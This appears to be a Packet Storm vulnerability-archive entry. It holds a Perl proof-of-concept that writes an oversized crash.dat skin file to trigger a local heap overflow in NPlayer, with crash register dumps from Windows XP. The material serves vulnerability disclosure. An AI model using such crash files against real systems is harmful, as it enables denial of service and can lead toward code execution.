NPlayer Heap Overflow

2010-01-14T00:00:00
ID PACKETSTORM:85072
Type packetstorm
Reporter Rehan Ahmed
Modified 2010-01-14T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#Exploit Title:NPlayer (.dat Skin File) Local Heap Overflow PoC  
#Date:13/01/2010  
#Author:Vulnerability Discovered By Rehan Ahmed (rehan@rewterz.com)  
#Software Link:http://www.softpedia.com/get/Multimedia/Video/Video-Players/nplayer.shtml  
#Tested On: WinXP SP2  
########################################################################################  
##EBX 41414141  
##ESP 0012EF6C  
##EBP 00DA50F8 ASCII "C:\Program Files\n.player\skins\crash.dat"  
##ESI 0012EFD8  
##EDI 014143F8  
##EIP 7C90EAF0 ntdll.7C90EAF0  
#######################################################################################  
########################################################################################  
my $boom="\x41" x 5000;  
my $file="crash.dat";  
open($FILE,">$file");  
print $FILE $boom;  
close($FILE);  
print "File Successfully Created\n";  
########################################################################################  
  
  
`